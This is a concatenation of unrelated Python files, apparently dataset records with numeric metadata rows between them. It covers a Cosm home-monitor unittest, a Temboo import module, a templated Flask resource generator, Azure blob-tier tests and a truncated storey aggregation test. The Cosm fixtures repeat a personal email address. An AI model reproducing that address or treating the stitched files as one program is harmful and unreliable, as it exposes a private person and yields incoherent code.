Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
cs.report_data( json, data, http )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_with_HttpLib2Error( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=200 )
attr = {'request.side_effect': HttpLib2Error}
http = Mock( **attr )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_with_AttribueError( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=200 )
attr = {'request.side_effect': AttributeError}
http = Mock( **attr )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_config_topic_name( self, c ):
options = MagicMock( in_test_mode=False )
cs = COSMSend( options )
self.assertEqual( cs.config_topic_name, 'housemonitor.outputs.cosm.send' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_config_file_name( self, c ):
options = MagicMock( in_test_mode=False )
cs = COSMSend( options )
self.assertEqual( cs.configuration_file_name, 'housemonitor.outputs.cosm.send' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_output( self, c ):
options = MagicMock( in_test_mode=False )
device = 'device'
port = 'port'
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port}
cs = COSMSend( options )
cs.createDataStream = Mock()
cs.createJSONReport = Mock()
cs.report_data = Mock()
cs.output( data )
cs.createDataStream.called_once_with( device, port, data )
cs.createJSONReport.called_once_with( device, port, data )
cs.report_data.called_once_with( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_output_with_exception( self, c ):
options = MagicMock( in_test_mode=False )
device = 'device'
port = 'port'
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port}
cs = COSMSend( options )
cs.createDataStream = Mock()
cs.createJSONReport = Mock()
cs.report_data = Mock( side_effect=Exception( 'Test' ) )
cs.output( data )
cs.createDataStream.called_once_with( device, port, data )
cs.createJSONReport.called_once_with( device, port, data )
cs.report_data.called_once_with( device, port, data )
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main() # pragma: no cover
| 53.033654 | 172 | 0.525156 | 3,956 | 44,124 | 5.758847 | 0.05182 | 0.180888 | 0.084804 | 0.034369 | 0.91704 | 0.91208 | 0.87951 | 0.870073 | 0.836406 | 0.821965 | 0 | 0.028239 | 0.362773 | 44,124 | 831 | 173 | 53.097473 | 0.782018 | 0.030482 | 0 | 0.790387 | 0 | 0 | 0.12461 | 0.044775 | 0 | 0 | 0 | 0 | 0.069426 | 0 | null | null | 0.00267 | 0.022697 | null | null | 0.013351 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d4008354ef8fe25d8d0713269bb3307bb8938ee2 | 623 | py | Python | temboo/core/Library/Facebook/Actions/Custom/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/Facebook/Actions/Custom/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/Facebook/Actions/Custom/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.Facebook.Actions.Custom.CreateAction import CreateAction, CreateActionInputSet, CreateActionResultSet, CreateActionChoreographyExecution
from temboo.Library.Facebook.Actions.Custom.DeleteAction import DeleteAction, DeleteActionInputSet, DeleteActionResultSet, DeleteActionChoreographyExecution
from temboo.Library.Facebook.Actions.Custom.ReadActions import ReadActions, ReadActionsInputSet, ReadActionsResultSet, ReadActionsChoreographyExecution
from temboo.Library.Facebook.Actions.Custom.UpdateAction import UpdateAction, UpdateActionInputSet, UpdateActionResultSet, UpdateActionChoreographyExecution
| 124.6 | 156 | 0.903692 | 48 | 623 | 11.729167 | 0.479167 | 0.071048 | 0.120782 | 0.17762 | 0.269982 | 0.269982 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044944 | 623 | 4 | 157 | 155.75 | 0.946218 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d41f465e5d5d22f552dfd31b3ff134dc8deda10a | 2,040 | py | Python | generator/resource/templates/resource.py | aeksco/codotype-python-falcon-mongodb-generator | 32680519e249bafe678ee1f6d394893a2e36086c | [
"MIT"
] | null | null | null | generator/resource/templates/resource.py | aeksco/codotype-python-falcon-mongodb-generator | 32680519e249bafe678ee1f6d394893a2e36086c | [
"MIT"
] | null | null | null | generator/resource/templates/resource.py | aeksco/codotype-python-falcon-mongodb-generator | 32680519e249bafe678ee1f6d394893a2e36086c | [
"MIT"
] | null | null | null | from flask.views import MethodView
import json
# CRUD Resources
<%# Collection-level CRUD resource for the plural endpoint. Bug fix: post() -%>
<%# previously built its response but never returned it, so the generated -%>
<%# Flask view would fail on a None return value; it now mirrors get(). -%>
class <%- schema.class_name %>CollectionResource(MethodView):
    def get(self):
        status = 200
        body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>' })
        return body, status
    def post(self):
        status = 200
        body = json.dumps({ 'message': 'Hi, this is from POST /<%- schema.identifier_plural %>' })
        return body, status
<%# Single-record resource: GET / PUT / DELETE stubs addressed by an id path -%>
<%# parameter. Each handler just echoes the route it serves; real persistence -%>
<%# is expected to be wired in by the consumer of the generated code. -%>
class <%- schema.class_name %>ModelResource(MethodView):
    def get(self, <%- schema.identifier %>_id):
        status = 200
        body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>/<%- schema.identifier %>_id' })
        return body, status
    def put(self, <%- schema.identifier %>_id):
        status = 200
        body = json.dumps({ 'message': 'Hi, this is from PUT /<%- schema.identifier_plural %>/<%- schema.identifier %>_id' })
        return body, status
    def delete(self, <%- schema.identifier %>_id):
        status = 200
        body = json.dumps({ 'message': 'Hi, this is from DELETE /<%- schema.identifier_plural %>/<%- schema.identifier %>_id' })
        return body, status
<%# Emit one read-only related-resource class per relation declared on this -%>
<%# schema: BELONGS_TO renders a singular endpoint, HAS_MANY / OWNS_MANY a -%>
<%# plural one. Other relation types produce no class. -%>
<%_ schema.relations.forEach((rel) => { _%>
<% if (rel.type === 'BELONGS_TO') { -%>
class <%- schema.class_name %>Related<%- rel.schema.class_name %>Resource(MethodView):
    def get(self, <%- schema.identifier %>_id):
        status = 200
        body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>/<%- schema.identifier %>_id/<%- rel.schema.identifier %>' })
        return body, status
<% } else if (rel.type === 'HAS_MANY' || rel.type === 'OWNS_MANY') { -%>
class <%- schema.class_name %>Related<%- rel.schema.class_name_plural %>Resource(MethodView):
    def get(self, <%- schema.identifier %>_id):
        status = 200
        body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>/<%- schema.identifier %>_id/<%- rel.schema.identifier_plural %>' })
        return body, status
<% } -%>
<% }) -%>
| 42.5 | 161 | 0.609804 | 237 | 2,040 | 5.122363 | 0.185654 | 0.250412 | 0.14827 | 0.098023 | 0.760297 | 0.760297 | 0.728995 | 0.728995 | 0.728995 | 0.608731 | 0 | 0.013035 | 0.210294 | 2,040 | 47 | 162 | 43.404255 | 0.740534 | 0.006863 | 0 | 0.421053 | 0 | 0.052632 | 0.324111 | 0.107213 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d423efd60be2e94a137d4da9627c143009e85f12 | 13,905 | py | Python | tests/test_azure_5_tier.py | OLC-LOC-Bioinformatics/AzureStorage | ac4dbd83e307a5b8d3fd3b77103ec837b821c564 | [
"MIT"
] | null | null | null | tests/test_azure_5_tier.py | OLC-LOC-Bioinformatics/AzureStorage | ac4dbd83e307a5b8d3fd3b77103ec837b821c564 | [
"MIT"
] | null | null | null | tests/test_azure_5_tier.py | OLC-LOC-Bioinformatics/AzureStorage | ac4dbd83e307a5b8d3fd3b77103ec837b821c564 | [
"MIT"
] | null | null | null | from azure_storage.methods import client_prep, extract_account_name
from azure_storage.azure_tier import AzureContainerTier, AzureTier, cli, container_tier, file_tier, folder_tier
from unittest.mock import patch
import argparse
import pytest
import azure
import os
@pytest.fixture(name='variables', scope='module')
def setup():
    """Module-scoped bag of shared settings for the tier tests.

    The account name is derived from the passphrase; the remaining fields
    (connection string, clients) are attached later by test_tier_client_prep.
    """
    class _Settings:
        def __init__(self):
            self.passphrase = 'AzureStorage'
            self.account_name = extract_account_name(passphrase=self.passphrase)
            self.container_name = '000000container'
            self.storage_tier = 'Cool'
    return _Settings()
def test_tier_client_prep(variables):
    """client_prep must hand back a usable BlobServiceClient (and friends)
    for the test container; the clients are stashed on the shared fixture.
    """
    variables.container_name, variables.connect_str, variables.blob_service_client, variables.container_client = \
        client_prep(container_name=variables.container_name,
                    passphrase=variables.passphrase,
                    account_name=variables.account_name)
    # isinstance instead of `type(...) ==`: idiomatic type check (accepts
    # subclasses, flagged by flake8 E721 otherwise).
    assert isinstance(variables.blob_service_client, azure.storage.blob._blob_service_client.BlobServiceClient)
@pytest.mark.parametrize('file_name',
                         ['file_1.txt',
                          'file_1.txt',
                          'container_integration/file_2.txt',
                          'nested_container/nested_folder/nested_folder_2/nested_folder_test_1.txt',
                          'ABC/123/nested_folder_test_1.txt'])
def test_file_tier_cool(variables, file_name):
    """Setting a single blob to the 'Cool' tier must be visible in the listing."""
    AzureTier.file_tier(container_client=variables.container_client,
                        object_name=file_name,
                        blob_service_client=variables.blob_service_client,
                        container_name=variables.container_name,
                        storage_tier=variables.storage_tier)
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == file_name:
            found = True
            assert blob.blob_tier == variables.storage_tier
    # Bug fix: the loop previously asserted nothing when no blob matched,
    # letting the test pass vacuously.
    assert found, f'{file_name} not found in container listing'
@pytest.mark.parametrize('file_name',
                         ['file_1.txt',
                          'file_1.txt',
                          'container_integration/file_2.txt',
                          'nested_container/nested_folder/nested_folder_2/nested_folder_test_1.txt',
                          'ABC/123/nested_folder_test_1.txt'])
def test_file_tier_hot(variables, file_name):
    """Moving the same blobs back to the 'Hot' tier must also take effect."""
    storage_tier = 'Hot'
    AzureTier.file_tier(container_client=variables.container_client,
                        object_name=file_name,
                        blob_service_client=variables.blob_service_client,
                        container_name=variables.container_name,
                        storage_tier=storage_tier)
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == file_name:
            found = True
            assert blob.blob_tier == storage_tier
    # Bug fix: fail explicitly if the blob never appears instead of passing
    # vacuously.
    assert found, f'{file_name} not found in container listing'
@pytest.mark.parametrize('file_name',
                         ['file_3.txt',
                          'container_integration_2/file_2.txt',
                          'nested_container/nested_folder/nested_folder_2/nested_folder_test_14.txt',
                          'ABC/321/nested_folder_test_1.txt'])
def test_file_tier_missing(variables, file_name):
    """Re-tiering a blob that does not exist must abort with SystemExit."""
    with pytest.raises(SystemExit):
        AzureTier.file_tier(object_name=file_name,
                            container_client=variables.container_client,
                            container_name=variables.container_name,
                            blob_service_client=variables.blob_service_client,
                            storage_tier=variables.storage_tier)
def test_file_tier_invalid_category(variables):
    """AzureTier.main() must exit when the category does not match the target."""
    with pytest.raises(SystemExit):
        tier_setter = AzureTier(object_name='file_1.txt',
                                container_name=variables.container_name,
                                account_name=variables.account_name,
                                passphrase=variables.passphrase,
                                storage_tier=variables.storage_tier,
                                category='container')
        tier_setter.main()
def test_file_tier_invalid_container(variables):
    """AzureTier.main() must exit when pointed at a nonexistent container."""
    with pytest.raises(SystemExit):
        tier_setter = AzureTier(object_name='file_1.txt',
                                container_name='000000000container',
                                account_name=variables.account_name,
                                passphrase=variables.passphrase,
                                storage_tier=variables.storage_tier,
                                category='file')
        tier_setter.main()
@patch('argparse.ArgumentParser.parse_args')
def test_file_tier_integration(mock_args, variables):
    """End-to-end: mocked CLI arguments drive file_tier and the blob lands on
    the configured tier."""
    file_name = 'container_integration/file_2.txt'
    mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
                                                account_name=variables.account_name,
                                                container_name=variables.container_name,
                                                verbosity='info',
                                                file=file_name,
                                                storage_tier=variables.storage_tier)
    arguments = cli()
    file_tier(arguments)
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == file_name:
            found = True
            assert blob.blob_tier == variables.storage_tier
    # Bug fix: guard against a vacuous pass when the blob is missing.
    assert found, f'{file_name} not found in container listing'
@pytest.mark.parametrize('folder_name,check_file',
                         [('container_integration/', 'nested_folder_test_1.txt'),
                          ('container_integration/', 'nested_folder_test_1.txt'),
                          ('nested_container/nested_folder', 'nested_file_2.txt'),
                          ('ABC/', 'nested_folder_test_1.txt')])
def test_folder_tier_cool(variables, folder_name, check_file):
    """Re-tiering a folder must cool a known file inside that folder."""
    AzureTier.folder_tier(container_client=variables.container_client,
                          object_name=folder_name,
                          blob_service_client=variables.blob_service_client,
                          container_name=variables.container_name,
                          storage_tier=variables.storage_tier)
    target = os.path.join(folder_name, check_file)
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == target:
            found = True
            assert blob.blob_tier == variables.storage_tier
    # Bug fix: previously a missing blob made the test pass without asserting.
    assert found, f'{target} not found in container listing'
@pytest.mark.parametrize('folder_name,check_file',
                         [('container_integration/', 'nested_folder_test_1.txt'),
                          ('container_integration/', 'nested_folder_test_1.txt'),
                          ('nested_container/nested_folder/', 'nested_file_2.txt'),
                          ('ABC/', 'nested_folder_test_1.txt')])
def test_folder_tier_hot(variables, folder_name, check_file):
    """Re-tiering the same folders back to 'Hot' must take effect."""
    storage_tier = 'Hot'
    AzureTier.folder_tier(container_client=variables.container_client,
                          object_name=folder_name,
                          blob_service_client=variables.blob_service_client,
                          container_name=variables.container_name,
                          storage_tier=storage_tier)
    target = os.path.join(folder_name, check_file)
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == target:
            found = True
            assert blob.blob_tier == storage_tier
    # Bug fix: fail explicitly when the expected blob is absent.
    assert found, f'{target} not found in container listing'
@pytest.mark.parametrize('folder_name',
                         ['container_integration_4/',
                          'nested_container_13/nested_folder/',
                          '123/ABC/'])
def test_folder_tier_missing(variables, folder_name):
    """Re-tiering a folder that does not exist must abort with SystemExit."""
    with pytest.raises(SystemExit):
        AzureTier.folder_tier(object_name=folder_name,
                              container_client=variables.container_client,
                              container_name=variables.container_name,
                              blob_service_client=variables.blob_service_client,
                              storage_tier=variables.storage_tier)
def test_folder_tier_invalid_container(variables):
    """The folder category must also exit on a nonexistent container."""
    with pytest.raises(SystemExit):
        tier_setter = AzureTier(object_name='container_integration',
                                container_name='000000000container',
                                account_name=variables.account_name,
                                passphrase=variables.passphrase,
                                storage_tier=variables.storage_tier,
                                category='folder')
        tier_setter.main()
@patch('argparse.ArgumentParser.parse_args')
def test_folder_tier_integration_cool(mock_args, variables):
    """End-to-end: CLI-driven folder_tier cools a file inside the folder."""
    folder_name = 'container_integration/'
    mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
                                                account_name=variables.account_name,
                                                container_name=variables.container_name,
                                                verbosity='info',
                                                folder=folder_name,
                                                storage_tier=variables.storage_tier)
    arguments = cli()
    folder_tier(arguments)
    target = os.path.join(folder_name, 'nested_folder_test_1.txt')
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == target:
            found = True
            assert blob.blob_tier == variables.storage_tier
    # Bug fix: guard against a vacuous pass when the blob is missing.
    assert found, f'{target} not found in container listing'
@patch('argparse.ArgumentParser.parse_args')
def test_folder_tier_integration_hot(mock_args, variables):
    """End-to-end: CLI-driven folder_tier moves the folder back to 'Hot'."""
    folder_name = 'container_integration/'
    storage_tier = 'Hot'
    mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
                                                account_name=variables.account_name,
                                                container_name=variables.container_name,
                                                verbosity='info',
                                                folder=folder_name,
                                                storage_tier=storage_tier)
    arguments = cli()
    folder_tier(arguments)
    target = os.path.join(folder_name, 'nested_folder_test_1.txt')
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == target:
            found = True
            assert blob.blob_tier == storage_tier
    # Bug fix: fail explicitly when the expected blob is absent.
    assert found, f'{target} not found in container listing'
def test_container_tier_cool(variables):
    """Re-tiering the whole container must cool a known file at its root."""
    AzureContainerTier.container_tier(container_client=variables.container_client,
                                      blob_service_client=variables.blob_service_client,
                                      container_name=variables.container_name,
                                      storage_tier=variables.storage_tier)
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == 'file_1.txt':
            found = True
            assert blob.blob_tier == variables.storage_tier
    # Bug fix: previously a missing blob made the test pass without asserting.
    assert found, 'file_1.txt not found in container listing'
def test_container_tier_hot(variables):
    """Re-tiering the whole container back to 'Hot' must take effect."""
    storage_tier = 'Hot'
    AzureContainerTier.container_tier(container_client=variables.container_client,
                                      blob_service_client=variables.blob_service_client,
                                      container_name=variables.container_name,
                                      storage_tier=storage_tier)
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == 'file_1.txt':
            found = True
            assert blob.blob_tier == storage_tier
    # Bug fix: fail explicitly when the expected blob is absent.
    assert found, 'file_1.txt not found in container listing'
@patch('argparse.ArgumentParser.parse_args')
def test_container_tier_integration_cool(mock_args, variables):
    """End-to-end: CLI-driven container_tier cools a nested blob."""
    mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
                                                account_name=variables.account_name,
                                                container_name=variables.container_name,
                                                verbosity='info',
                                                storage_tier=variables.storage_tier)
    arguments = cli()
    container_tier(arguments)
    target = os.path.join('container_integration', 'nested_folder_test_1.txt')
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == target:
            found = True
            assert blob.blob_tier == variables.storage_tier
    # Bug fix: guard against a vacuous pass when the blob is missing.
    assert found, f'{target} not found in container listing'
@patch('argparse.ArgumentParser.parse_args')
def test_container_tier_integration_hot(mock_args, variables):
    """End-to-end: CLI-driven container_tier moves the container back to 'Hot'."""
    storage_tier = 'Hot'
    mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
                                                account_name=variables.account_name,
                                                container_name=variables.container_name,
                                                verbosity='info',
                                                storage_tier=storage_tier)
    arguments = cli()
    container_tier(arguments)
    target = os.path.join('container_integration', 'nested_folder_test_1.txt')
    found = False
    for blob in variables.container_client.list_blobs():
        if blob.name == target:
            found = True
            assert blob.blob_tier == storage_tier
    # Bug fix: fail explicitly when the expected blob is absent.
    assert found, f'{target} not found in container listing'
@patch('argparse.ArgumentParser.parse_args')
def test_container_tier_integration_missing(mock_args, variables):
    """The CLI path must exit when pointed at a container that does not exist."""
    with pytest.raises(SystemExit):
        mock_args.return_value = argparse.Namespace(account_name=variables.account_name,
                                                    passphrase=variables.passphrase,
                                                    container_name='00000container',
                                                    verbosity='info',
                                                    storage_tier=variables.storage_tier)
        container_tier(cli())
def test_cli():
    """The installed console entry point must print its help and exit cleanly.

    Bug fix: the return status of os.system was previously discarded, so a
    missing or broken 'AzureTier' entry point went unnoticed.
    """
    assert os.system('AzureTier -h') == 0
| 49.308511 | 115 | 0.580295 | 1,324 | 13,905 | 5.737915 | 0.067221 | 0.073845 | 0.063183 | 0.056865 | 0.854679 | 0.82809 | 0.808609 | 0.794919 | 0.77807 | 0.762406 | 0 | 0.008795 | 0.345847 | 13,905 | 281 | 116 | 49.483986 | 0.826407 | 0 | 0 | 0.754167 | 0 | 0 | 0.116412 | 0.091163 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.0875 | false | 0.05 | 0.029167 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d44da20a4d7d37cf044e282fd73e2d09f924507f | 74,076 | py | Python | tests/test_aggregate_by_key.py | abrookins/storey | ebcb1daba5d72e1a7f6e5cd7ea760248dd4f72e5 | [
"Apache-2.0"
] | null | null | null | tests/test_aggregate_by_key.py | abrookins/storey | ebcb1daba5d72e1a7f6e5cd7ea760248dd4f72e5 | [
"Apache-2.0"
] | null | null | null | tests/test_aggregate_by_key.py | abrookins/storey | ebcb1daba5d72e1a7f6e5cd7ea760248dd4f72e5 | [
"Apache-2.0"
] | null | null | null | import math
import queue
from datetime import datetime, timedelta
from storey import build_flow, SyncEmitSource, Reduce, Table, AggregateByKey, FieldAggregator, NoopDriver
from storey.dtypes import SlidingWindows, FixedWindows, EmitAfterMaxEvent, EmitEveryEvent
# Fixed, timezone-aware reference timestamp; every emitted test event is an
# offset (in 25-minute steps) from this instant.
test_base_time = datetime.fromisoformat("2020-07-21T21:40:00+00:00")
def append_return(lst, x):
    """Append ``x`` to ``lst`` in place and hand the same list back.

    Convenience for Reduce steps, which must return the accumulator.
    """
    lst += [x]
    return lst
def test_sliding_window_simple_aggregation_flow():
    """Ten events for one key, 25 minutes apart, must produce running
    sum/avg/min/max over sliding 1h/2h/24h windows (10m period) on every
    emitted event. The expected table below was derived by hand: e.g. at the
    last event the 1h window covers values 7+8+9 -> sum_1h == 24.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg", "min", "max"],
                                        SlidingWindows(['1h', '2h', '24h'], '10m'))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(10):
        data = {'col1': i}
        controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))

    controller.terminate()
    actual = controller.await_termination()
    expected_results = [
        {'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
         'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
         'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
        {'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
         'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
         'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
        {'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
         'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
         'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
        {'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
         'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
         'number_of_stuff_max_24h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5},
        {'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
         'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
         'number_of_stuff_max_24h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
